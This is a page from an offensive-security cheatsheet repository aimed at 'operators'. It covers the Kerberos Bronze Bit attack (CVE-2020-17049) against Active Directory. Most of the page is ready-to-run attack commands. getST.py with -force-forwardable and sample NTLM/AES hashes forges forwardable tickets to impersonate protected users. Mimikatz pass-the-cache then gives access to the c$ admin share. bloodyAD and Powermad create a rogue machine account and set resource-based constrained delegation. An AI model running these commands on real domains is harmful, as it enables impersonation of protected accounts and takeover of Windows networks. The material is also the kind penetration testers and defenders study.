daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

kerberos-bronze-bit.md (4207B)


      1 ---
      2 title: "Kerberos - Bronze Bit"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/kerberos-bronze-bit.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/kerberos-bronze-bit.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Kerberos - Bronze Bit
     12 
     13 CVE-2020-17049
     14 
     15 > An attacker can impersonate users which are not allowed to be delegated. This includes members of the **Protected Users** group and any other users explicitly configured as **sensitive and cannot be delegated**.
     16 > Patch is out on November 10, 2020, DC are most likely vulnerable until [February 2021](https://support.microsoft.com/en-us/help/4598347/managing-deployment-of-kerberos-s4u-changes-for-cve-2020-17049).
     17 
     18 :warning: Patched Error Message : `[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)`
     19 
     20 Requirements:
     21 
     22 * Service account's password hash
     23 * Service account's with `Constrained Delegation` or `Resource Based Constrained Delegation`
     24 * [Impacket PR #1013](https://github.com/SecureAuthCorp/impacket/pull/1013)
     25 
     26 **Attack #1** - Bypass the `Trust this user for delegation to specified services only – Use Kerberos only` protection and impersonate a user who is protected from delegation.
     27 
     28 ```powershell
     29 # forwardable flag is only protected by the ticket encryption which uses the service account's password 
     30 $ getST.py -spn cifs/Service2.test.local -impersonate Administrator -hashes <LM:NTLM hash> -aesKey <AES hash> test.local/Service1 -force-forwardable -dc-ip <Domain controller> # -> Forwardable
     31 
     32 $ getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes aad3b435b51404eeaad3b435b51404ee:7c1673f58e7794c77dead3174b58b68f -aesKey 4ffe0c458ef7196e4991229b0e1c4a11129282afb117b02dc2f38f0312fc84b4 test.local/Service1 -force-forwardable
     33 
     34 # Load the ticket
     35 .\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit
     36 
     37 # Access "c$"
     38 ls \\service2.test.local\c$
     39 ```
     40 
     41 **Attack #2** - Write Permissions to one or more objects in the AD
     42 
     43 * Windows/Linux:
     44 
     45     ```ps1
     46     bloodyAD -u user -p 'totoTOTOtoto1234*' -d test.local --host 10.100.10.5 add computer AttackerService 'AttackerServicePassword'
     47     bloodyAD --host 10.1.0.4 -u user -p 'totoTOTOtoto1234*' -d test.local add rbcd 'Service2$' 'AttackerService$'
     48 
     49     # Execute the attack
     50     getST.py -spn cifs/Service2.test.local -impersonate User2 -dc-ip 10.100.10.5 -force-forwardable 'test.local/AttackerService$:AttackerServicePassword'
     51     ```
     52 
     53 * Windows only:
     54 
     55     ```powershell
     56     # Create a new machine account
     57     Import-Module .\Powermad\powermad.ps1
     58     New-MachineAccount -MachineAccount AttackerService -Password $(ConvertTo-SecureString 'AttackerServicePassword' -AsPlainText -Force)
     59     .\mimikatz\mimikatz.exe "kerberos::hash /password:AttackerServicePassword /user:AttackerService /domain:test.local" exit
     60 
     61     # Set PrincipalsAllowedToDelegateToAccount
     62     Install-WindowsFeature RSAT-AD-PowerShell
     63     Import-Module ActiveDirectory
     64     Get-ADComputer AttackerService
     65     Set-ADComputer Service2 -PrincipalsAllowedToDelegateToAccount AttackerService$
     66     Get-ADComputer Service2 -Properties PrincipalsAllowedToDelegateToAccount
     67 
     68     # Execute the attack
     69     python .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes 830f8df592f48bc036ac79a2bb8036c5:830f8df592f48bc036ac79a2bb8036c5 -aesKey 2a62271bdc6226c1106c1ed8dcb554cbf46fb99dda304c472569218c125d9ffc test.local/AttackerService -force-forwardable
     70 
     71     # Load the ticket
     72     .\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit | Out-Null
     73     ```
     74 
     75 ## References
     76 
     77 * [CVE-2020-17049: Kerberos Bronze Bit Attack – Practical Exploitation - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack/)
     78 * [CVE-2020-17049: Kerberos Bronze Bit Attack – Theory - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory/)
     79 * [Kerberos Bronze Bit Attack (CVE-2020-17049) Scenarios to Potentially Compromise Active Directory](https://www.hub.trimarcsecurity.com/post/leveraging-the-kerberos-bronze-bit-attack-cve-2020-17049-scenarios-to-compromise-active-directory)